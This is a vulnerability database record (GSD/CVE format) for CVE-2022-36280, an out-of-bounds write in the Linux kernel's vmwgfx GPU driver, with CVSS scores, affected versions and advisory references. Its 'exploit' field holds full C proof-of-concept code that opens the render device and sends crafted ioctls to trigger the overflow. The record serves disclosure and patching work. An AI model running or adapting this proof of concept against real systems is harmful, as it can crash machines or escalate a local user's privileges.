gsd-2022-36280
Vulnerability from gsd
Modified
2023-12-13 01:19
Details
An out-of-bounds (OOB) memory access vulnerability was found in the vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_kms.c, in the GPU component of the Linux kernel, via the device file '/dev/dri/renderD128' (or Dxxx). This flaw allows a local attacker with a user account on the system to gain privileges, causing a denial of service (DoS).
Aliases



{
   GSD: {
      alias: "CVE-2022-36280",
      description: "An out-of-bounds(OOB) memory access vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_kms.c in GPU component in the Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).",
      id: "GSD-2022-36280",
      references: [
         "https://www.suse.com/security/cve/CVE-2022-36280.html",
         "https://www.debian.org/security/2023/dsa-5324",
         "https://advisories.mageia.org/CVE-2022-36280.html",
         "https://ubuntu.com/security/CVE-2022-36280",
      ],
   },
   gsd: {
      metadata: {
         exploitCode: "unknown",
         remediation: "unknown",
         reportConfidence: "confirmed",
         type: "vulnerability",
      },
      osvSchema: {
         aliases: [
            "CVE-2022-36280",
         ],
         details: "An out-of-bounds(OOB) memory access vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_kms.c in GPU component in the Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).",
         id: "GSD-2022-36280",
         modified: "2023-12-13T01:19:21.618953Z",
         schema_version: "1.4.0",
      },
   },
   namespaces: {
      "cve.org": {
         CVE_data_meta: {
            AKA: "Anolis",
            ASSIGNER: "security@openanolis.org",
            DATE_PUBLIC: "2022-09-06T07:00:00.000Z",
            ID: "CVE-2022-36280",
            STATE: "PUBLIC",
            TITLE: "There is an out-of-bounds write vulnerability in vmwgfx driver",
         },
         affects: {
            vendor: {
               vendor_data: [
                  {
                     product: {
                        product_data: [
                           {
                              product_name: "kernel",
                              version: {
                                 version_data: [
                                    {
                                       version_affected: ">=",
                                       version_name: "5.13.0-52",
                                       version_value: "v3.2-rc1",
                                    },
                                 ],
                              },
                           },
                        ],
                     },
                     vendor_name: "Linux",
                  },
               ],
            },
         },
         credit: [
            {
               lang: "eng",
               value: "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab",
            },
         ],
         data_format: "MITRE",
         data_type: "CVE",
         data_version: "4.0",
         description: {
            description_data: [
               {
                  lang: "eng",
                  value: "An out-of-bounds(OOB) memory access vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_kms.c in GPU component in the Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).",
               },
            ],
         },
         exploit: [
            {
               lang: "eng",
               value: "#include <stdio.h>\n#include <string.h>\n#include <unistd.h>\n#include <errno.h>\n\n#include <linux/if_tun.h>\n#include <net/if.h>\n#include <sys/ioctl.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <fcntl.h>\n#include <pthread.h>\n#include <sys/socket.h>\n#include <string.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <sys/ioctl.h>\n#include <errno.h>\n#include <stdio.h>\n#include <fcntl.h>\n#include <pthread.h>\n#include <stdio.h>\n#include <sys/types.h>\n#include <stdint.h>\n#include <netinet/ip.h>\n#include <sys/resource.h>\n#include <sys/syscall.h>\n#include <limits.h>\n#include <sys/mman.h>\n\n#include <linux/fs.h>\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int handle,int sid){\nchar *vaddr=(unsigned long)mmap(NULL,\n               0x2000,\n                PROT_READ | PROT_WRITE,\n                MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE /* important */,\n-1, 0);\n\t\n\t if (mlock((void *)vaddr, 0x2000) == -1) {\n                printf(\"[-] failed to lock memory (%s), aborting!\\n\",\n                        strerror(errno));\n                        }\n                        \n          memset(vaddr,\"a\",0x2000);     \nint 
cmd[0x1000]={0};\ncmd[0]=1044;\ncmd[1]=0x50;\ncmd[2]=handle;\ncmd[3]=0;\ncmd[5]=sid;\ncmd[6]=0;\ncmd[7]=0;\ncmd[13]=1;\ncmd[12]=0x2000;\ncmd[14]=1;\ncmd[19]=12;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=1;  \n                if (ioctl(fd, 0x4028644C, &arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, &arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, &arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint handle=alloc_bo();\n  int sid =    create_surface();     \n  printf(\"%d\",sid);     \n    poc(handle,sid);            \n  \n}\n\n\n",
            },
         ],
         generator: {
            engine: "Vulnogram 0.0.9",
         },
         impact: {
            cvss: {
               attackComplexity: "LOW",
               attackVector: "NETWORK",
               availabilityImpact: "HIGH",
               baseScore: 6.3,
               baseSeverity: "MEDIUM",
               confidentialityImpact: "NONE",
               integrityImpact: "LOW",
               privilegesRequired: "LOW",
               scope: "UNCHANGED",
               userInteraction: "REQUIRED",
               vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
               version: "3.1",
            },
         },
         problemtype: {
            problemtype_data: [
               {
                  description: [
                     {
                        lang: "eng",
                        value: "CWE-120 Buffer Overflow",
                     },
                  ],
               },
            ],
         },
         references: {
            reference_data: [
               {
                  name: "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071",
                  refsource: "MISC",
                  url: "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071",
               },
               {
                  name: "DSA-5324",
                  refsource: "DEBIAN",
                  url: "https://www.debian.org/security/2023/dsa-5324",
               },
               {
                  name: "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update",
                  refsource: "MLIST",
                  url: "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html",
               },
               {
                  name: "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update",
                  refsource: "MLIST",
                  url: "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html",
               },
            ],
         },
         source: {
            defect: [
               "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071",
            ],
            discovery: "INTERNAL",
         },
      },
      "nvd.nist.gov": {
         configurations: {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [],
                  cpe_match: [
                     {
                        cpe23Uri: "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "5.13.0-52",
                        versionStartIncluding: "3.2",
                        vulnerable: true,
                     },
                  ],
                  operator: "OR",
               },
               {
                  children: [],
                  cpe_match: [
                     {
                        cpe23Uri: "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                  ],
                  operator: "OR",
               },
            ],
         },
         cve: {
            CVE_data_meta: {
               ASSIGNER: "security@openanolis.org",
               ID: "CVE-2022-36280",
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "en",
                     value: "An out-of-bounds(OOB) memory access vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_kms.c in GPU component in the Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "en",
                           value: "CWE-787",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071",
                     refsource: "MISC",
                     tags: [
                        "Issue Tracking",
                        "Permissions Required",
                        "Third Party Advisory",
                     ],
                     url: "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071",
                  },
                  {
                     name: "DSA-5324",
                     refsource: "DEBIAN",
                     tags: [
                        "Third Party Advisory",
                     ],
                     url: "https://www.debian.org/security/2023/dsa-5324",
                  },
                  {
                     name: "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update",
                     refsource: "MLIST",
                     tags: [],
                     url: "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html",
                  },
                  {
                     name: "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update",
                     refsource: "MLIST",
                     tags: [],
                     url: "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html",
                  },
               ],
            },
         },
         impact: {
            baseMetricV3: {
               cvssV3: {
                  attackComplexity: "LOW",
                  attackVector: "LOCAL",
                  availabilityImpact: "HIGH",
                  baseScore: 5.5,
                  baseSeverity: "MEDIUM",
                  confidentialityImpact: "NONE",
                  integrityImpact: "NONE",
                  privilegesRequired: "LOW",
                  scope: "UNCHANGED",
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.1",
               },
               exploitabilityScore: 1.8,
               impactScore: 3.6,
            },
         },
         lastModifiedDate: "2023-05-03T14:15Z",
         publishedDate: "2022-09-09T15:15Z",
      },
   },
}


